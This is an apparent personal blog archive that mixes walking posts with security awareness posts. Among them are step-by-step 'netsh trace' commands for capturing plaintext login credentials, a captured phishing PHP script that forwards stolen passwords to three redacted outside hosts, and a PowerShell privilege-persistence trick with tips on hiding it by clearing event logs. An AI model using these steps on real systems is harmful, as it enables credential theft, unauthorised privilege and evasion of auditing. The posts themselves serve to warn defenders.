Category Archives: Fun

A 5k from Dormagen to Leverkusen

21 September 2016

For some weeks now I try to go by bike to work, at least 2 days a week. The distance from Dormagen to my office in Leverkusen is 19 km. I need about an hour in the morning, which is about 7,500 steps, or roughly about a 5k walk.

The countryside along the Rhine dam is truly beautiful, in particular shortly after sunrise:

The Rhine dam between Dormagen and Cologne

Rhine dam between Dormagen and Cologne

Have a good day, and a great 5k.

netsh – The Cyber Attacker’s Tool of Choice

3 February 2016

For IT pros the Windows built-in command netsh is one of the tools of choice for troubleshooting network issues.

For a cyber attacker netsh is the tool of choice once he managed to get access to the company network. ‘netsh trace’ may be used to record every key stroke a user sends e.g. to the login dialog of web application or a banking application in plain text.

Using netsh trace is disturbingly easy:

[1] Start the recording session for programs connecting to internet services

netsh trace start scenario=InternetClient capture=yes tracefile=NetTrace-ICP.etl level=4

[2] Wait for the user to connect to a service …

[3] Stop the recording session

netsh trace stop

[4] Convert the trace file into readable format

netsh trace convert input=NetTrace-ICP.etl output=NetTrace-ICP.etl.xml dump=XML

[5] Open the file with notepad and search for the user name donot.like@get.phished:

<EventData>
<Data Name="RequestHandle">0xCC000C</Data>
<Data Name="Length">502</Data>
<Data Name="Headers">loginfmt=donot.like%40get.phished&amp;passwd=-Plain-Text-Here-&amp;login=donot.like%40get.phished&amp;……</Data>
</EventData>

Thus netsh trace can replace key loggers or tools like Mimikatz or Lazagne. Since the attacker must not reload utilities from the C&C server the likelihood of detection decreases.

Fortunately the attacker must run netsh trace in administrative context, but since many users always work in admin context this is not a real hurdle.

Apart from cyber attacks users should be concerned about privacy issues. If a support technician starts netsh in a remote troubleshooting session the likelihood is high that he may see your password or PIN. To prevent trouble users should always change their passwords after netsh was used to solve network issues.

Take care!

A 5k walk along the Levada do Caldeirão Verde in Madeira

7 November 2015

During the week from October 26 to 31 we were on vacation in Madeira. We went hiking nearly every day, usually far more than 5 km.

On Saturday we walked along the walkway of the Levada do Caldeirão Verde. Although it was raining almost all day this was the most beautiful hike during our vacation.

OLYMPUS DIGITAL CAMERA

We made in total 13 km, but it was fun nonetheless.

Have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exiting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone I had the chance to create a copy of the POST processing php procedure:

…
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) { 
 global $textHos;
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);    
}
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to 3 sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classify the pages as malicious or phishing site.

What surprised me was that most of the pages were listed on Blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a Blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the The Anti-Phishing Working Group (APWG) and National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Unhandled program exceptions and informative error messages – free support for Cyber Attackers

30 August 2015

Today companies know their business critical information and protect them against unauthorized use and disclosure.

Cyber criminals don’t attack the business critical information, but the application systems through the vulnerabilities in the system and application software. Application and system developers make life easy for them by disclosing information about the system design caused by unhandled program exceptions and informative error messages.

Unhandled program exceptions exist in almost every web application. Candidates are URLs with parameters like

https://xxxxx.xxxxxxx.com/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?Page=HRS_CE_HM_PRE
&Action=A&SiteId=11&languageCd=GER

Most programmers do in-depth tests to make sure that the program retrieves exactly the information defined in the requirements specification. But what happens if an invalid value is input?

Let’s rewrite this URL and assign SiteId the value  -1:

https://xxxxx.xxxxxxx.com/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?Page=HRS_CE_HM_PRE
&Action=A&SiteId=-1&languageCd=GER

The result is:

A negative number was assigned to an Attribute of type "Unsigned": HRS_SITE_ID.HRS_SITE_ID. (2,121) WEBLIB_XXXXXXXX.ISCRIPT_ XXXXXXXX.FieldFormula Name:ax_Parameter_security PCPC:1176 Statement:19 Called from:WEBLIB_ XXXXXXXX.ISCRIPT_ XXXXXXXX.FieldFormula Name:Iscript_Load XXXXXXXX Portal Statement:28

Okay, it’s not the entire program stack, but it shows that input is not fully sanitized, and gives an attacker the hint, that the site is possibly vulnerable against SQL injection attacks.

Unchecked error conditions are listed as CWE-391 in the Common Weakness Enumeration list. Programmers can easily solve this problem by adding an extra “when others” exception to the code.

The best error message is one that reveals neither information about the application system nor about the internal structure of the application:

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable. Please excuse the inconvenience caused.

Period. For a good overview about error handling problems and mitigations see the SANS Securing Web Application Technologies (SWAT) checklist.

Have a good weekend, and fun with boundary value tests.

Nomination for the “Most-Slanting-Phishing-Site-of-the-Year” award

10 July 2015

I am receiving about 20 phishing mails a week. Most attackers invest a lot of effort in their counterfeits but, sometimes they overshoot the mark. My July candidate for the Most-Slanting-Phishing-Site-of-the-Year award is:

Most-Slanting-Phishing-Site-of-the-Year award - July 2015 candidate

Most-Slanting-Phishing-Site-of-the-Year award – July 2015 candidate

Earlier this week the Italian company Hacking Team was hacked. The attackers made more than 400GB of confidential company data available to the public. The leaked data included tools and exploits provided by the company to carry out attacks, among them a new Flash Player zero day affecting Flash Player up to version 18.0.0.194.

Two critical vulnerabilities in as many weeks, that’s really annoying. The problem with the latest Flash Player attacks is that the payload is hidden in Flash Player SWF files. Thus, basically every SWF file might carry a malicious payload…

… It’s definitely time to solve the Flash Player problems once and for all.

Have a good weekend.

HACKADAY: Keystroke Sniffer Hides as a Wall Wart, is Scary

22 January 2015

Samy’s video ‘Keystroke Sniffer Hides as a Wall Wart, is Scary’ is very worth seeing.

A keystroke sniffer that records and decrypts keystrokes sent from wireless keyboard – simply brilliant, and truly frightening. In offices where business critical information is processed, wireless keyboards should be banned as soon as possible.

What really worries me is that, in the fight against the omnipresent danger from the Internet, we miss the obvious under our fingers.

Enjoy the video.

Don’t panic!

Fun with 24h Admin Rights

19 January 2015

Once you granted 24h admin rights to a user he is able to grant himself privileges with a just few clicks. Startup scripts give an easy means to do this.

About startup scripts.

With startup scripts Windows offers administrators a powerful tool to run commands at system boot. Scripts are stored in directory %windir%\System32\Group Policy\Machine\Scripts\Startup and executed with system privileges.

But just adding a script to the startup directory is not sufficient to execute the script. Because startup scripts could be easily used to compromise a system they have to be enabled through the Local Group Policy Editor gpedit.msc. And at least for enabling a startup script with gpedit.msc local admin privileges are required.

3 Steps for 24h admins to get admin privileges again.

  1. Create a PowerShell script for adding your user account to the local administrators group.
# addMalUser.ps1
$Domain = "YourDomain
$Computer = "YourComputer"
$Username = "YourUsername"

$Group = [ADSI]"WinNT://$Computer/Administrators,group"
$User = [ADSI]"WinNT://$Domain/$Username,user"
$Group.Add($User.Path)

Save this script to file addMalUser.ps1. To get the exact values for $Domain, $Computer and $User please run set in a command prompt.

  1. Copy script addMalUser.ps1 to %windir%\System32\GroupPolicy\Machine\Scripts\Startup.

  2. Start gpedit.msc and add script addMalUser.ps1 to the startup scripts.

GPEdit Add Startup Script

Gpedit Add Startup Script Dialog (click to enlarge)

Tips for would-be malicious users.

  1. Purple Loosestrife in my Garden. Feels like Summer.
    Purple Loosestrife in my Garden. Feels like Summer.

    Please note that this operation is recorded in the Security Event Log of your computer.
    Never mind! Only very few organizations are scanning security events on user workstations. Those which tolerate 24h admin rights are certainly not amongst them.

  2. Please feel free to add switches to this script to run it on demand only. This will help to hide your malicious activities, because you could remove yourself from the admin group or reset the Security Event Log after the job is done.

Have Fun with 24h Admin Rights!